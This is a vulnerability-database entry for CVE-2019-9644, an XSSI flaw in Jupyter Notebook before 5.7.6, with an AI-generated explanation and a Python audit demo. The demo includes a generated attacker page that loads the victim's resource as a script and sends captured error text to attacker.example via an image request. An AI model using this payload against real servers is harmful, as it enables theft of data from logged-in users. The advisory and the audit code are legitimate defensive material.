CVE-2019-9644
Description
An XSSI (cross-site inclusion) vulnerability in Jupyter Notebook before 5.7.6 allows inclusion of resources on malicious pages when visited by users who are authenticated with a Jupyter server. Access to the content of resources has been demonstrated with Internet Explorer through capturing of error messages, though not reproduced with other browsers. This occurs because Internet Explorer's error messages can include the content of any invalid JavaScript that was encountered.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
An XSSI vulnerability in Jupyter Notebook before 5.7.6 lets a malicious page include resources from a Jupyter server the victim is logged into; in Internet Explorer, the content of the included resource can be read back from the browser's JavaScript error messages.
Vulnerability
Jupyter Notebook versions before 5.7.6 contain a cross-site inclusion (XSSI) vulnerability. A malicious page can include resources from a Jupyter server (for example, via a script tag pointing at a known URL) when the visitor is authenticated to that server, because the browser attaches the victim's session credentials to the cross-site request. Reading the included content back has been demonstrated with Internet Explorer, whose JavaScript error messages can include the content of any invalid JavaScript it encountered; the leak was not reproduced with other browsers. [1][2]
Exploitation
An attacker hosts a web page that includes a resource from the Jupyter server, e.g. via a script tag pointing at a known URL. When a victim who is authenticated to that server visits the page in Internet Explorer, the browser fetches the resource with the victim's session and tries to parse it as JavaScript. Because the content is not valid JavaScript, the resulting error message includes its content, which an error handler on the attacker's page can capture and send back to the attacker. No user interaction beyond visiting the page is required. [2]
Impact
Successful exploitation allows an attacker to read the content of resources hosted on the Jupyter server that the victim has access to. This can lead to disclosure of sensitive information, such as notebook contents, configuration files, or other data reachable through the Jupyter server. The leak has been demonstrated only with Internet Explorer, and the victim must be authenticated to the server at the time of the visit. [2]
Mitigation
The vulnerability is fixed in Jupyter Notebook version 5.7.6, released on March 8, 2019. Users should upgrade to 5.7.6 or later. Users who cannot upgrade should avoid accessing Jupyter servers from Internet Explorer while authenticated, since that is the only browser in which the content leak has been demonstrated. The fix is available in commit 05aa4b2. [1][4]
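The following is an added example, not code from Jupyter Notebook, from commit 05aa4b2, or from this advisory. It covers both the Exploitation section (the attacker-side page that includes the victim's resource as a script and captures the browser's error message) and the Mitigation section (an audit of whether a resource can still be pulled in through a cross-origin script tag). The server, its two endpoints, the notebook-like document, the session cookie and the collector URL are all constructed for the demonstration; the hardened endpoint uses a generic XSSI defence (non-script MIME type plus `X-Content-Type-Options: nosniff`, and `Content-Disposition: attachment`), which is an assumption about good practice and not a description of what the Jupyter fix changed.

```python
"""XSSI exposure check for a resource served to cookie-authenticated users.

Added example, not Jupyter's code. Everything below (endpoints, document,
cookie, collector URL) is constructed for the demo.
"""
import http.server
import json
import threading
import urllib.error
import urllib.request

# Constructed sample data: a notebook-like JSON document and a session cookie.
SECRET_DOC = json.dumps({"cells": [{"source": "API_KEY = 'constructed-sample'"}]}).encode()
SESSION_COOKIE = "session=constructed-sample-cookie"

# MIME types a browser will execute from <script src> even when nosniff is set.
SCRIPT_MIME = {"application/javascript", "text/javascript",
               "application/x-javascript", "application/ecmascript", "text/ecmascript"}


class FileHandler(http.server.BaseHTTPRequestHandler):
    """Hypothetical file server: same document, two header policies."""

    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_GET(self):
        # Ambient cookie auth: exactly the property a cross-site <script src> abuses.
        if self.headers.get("Cookie") != SESSION_COOKIE:
            self.send_response(403)
            self.end_headers()
            return
        if self.path == "/files/weak/secret.ipynb":
            extra = {}  # nothing stops a cross-origin script tag from parsing the body
        elif self.path == "/files/hardened/secret.ipynb":
            extra = {"X-Content-Type-Options": "nosniff",
                     "Content-Disposition": "attachment; filename=secret.ipynb"}
        else:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(SECRET_DOC)))
        for name, value in extra.items():
            self.send_header(name, value)
        self.end_headers()
        self.wfile.write(SECRET_DOC)


def start_server():
    """Bind an ephemeral loopback port in a daemon thread; return the base URL."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), FileHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % srv.server_address[1]


def xssi_exposure(url, cookie=None):
    """Classify how <script src=url> on a hostile origin would fare.

    'script-includable': served as a script MIME type; any browser executes it.
    'parse-leak': non-script type but no nosniff, so the browser still fetches
                  and tries to parse it; a browser whose syntax-error text
                  includes the source (the IE behaviour in CVE-2019-9644) leaks it.
    'blocked': non-script type plus nosniff; the script tag is refused before parsing.
    'http-NNN': the server refused, e.g. 403 when the session cookie is absent.
    """
    headers = {"Cookie": cookie} if cookie else {}
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            ctype = resp.headers.get("Content-Type", "").split(";")[0].strip().lower()
            nosniff = resp.headers.get("X-Content-Type-Options", "").strip().lower() == "nosniff"
    except urllib.error.HTTPError as err:
        return "http-%d" % err.code
    if ctype in SCRIPT_MIME:
        return "script-includable"
    if not nosniff:
        return "parse-leak"
    return "blocked"


def probe_page_html(resource_url, collector_url):
    """Attacker-side page: include the victim's resource as a script and send
    whatever error text the browser reports to collector_url (hypothetical)."""
    return (
        "<!doctype html><html><body><script>\n"
        "window.onerror = function (msg, src, line) {\n"
        "  var img = new Image();\n"
        "  img.src = %s + '?m=' + encodeURIComponent(msg);\n"
        "  return true;\n"
        "};\n"
        "</script>\n"
        "<script src=%s></script>\n"
        "</body></html>\n"
    ) % (json.dumps(collector_url), json.dumps(resource_url))


if __name__ == "__main__":
    base = start_server()
    for path in ("/files/weak/secret.ipynb", "/files/hardened/secret.ipynb"):
        print(path, xssi_exposure(base + path, SESSION_COOKIE))
    print("no cookie:", xssi_exposure(base + "/files/weak/secret.ipynb"))
    print(probe_page_html(base + "/files/weak/secret.ipynb", "https://attacker.example/c"))
```

Run it and the weak endpoint classifies as `parse-leak` while the hardened one is `blocked`; a real audit would point `xssi_exposure()` at the target server's file and API URLs with a valid session cookie. The probe page is what a tester would open in the affected browser to confirm the leak end to end; the `window.onerror` handler is the capture step the Exploitation section describes, and the exact wording of the error message is browser-specific, so the page forwards it unparsed.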
AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Ecosystem | Affected versions | Patched versions |
|---|---|---|---|
| jupyter-notebook | PyPI | < 5.7.6 | 5.7.6 |
| notebook | PyPI | < 5.7.6 | 5.7.6 |
Affected products
- ghsa-coords (2 versions): < 5.7.6, + 1 more
- (no CPE) range: < 5.7.6
- (no CPE) range: < 5.7.6
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
- github.com/advisories/GHSA-hhx8-cr55-qcxx (GHSA, advisory)
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UP5RLEES2JBBNSNLBR65XM6PCD4EMF7D/ (MITRE, vendor advisory, x_refsource_FEDORA)
- lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VMDPJBVXOVO6LYGAT46VZNHH6JKSCURO/ (MITRE, vendor advisory, x_refsource_FEDORA)
- nvd.nist.gov/vuln/detail/CVE-2019-9644 (GHSA, advisory)
- github.com/jupyter/notebook/compare/f3f00df...05aa4b2 (GHSA, x_refsource_MISC, web)
- github.com/pypa/advisory-database/tree/main/vulns/notebook/PYSEC-2019-159.yaml (GHSA, web)
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UP5RLEES2JBBNSNLBR65XM6PCD4EMF7D (GHSA, web)
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VMDPJBVXOVO6LYGAT46VZNHH6JKSCURO (GHSA, web)
News mentions
No linked articles in our index yet.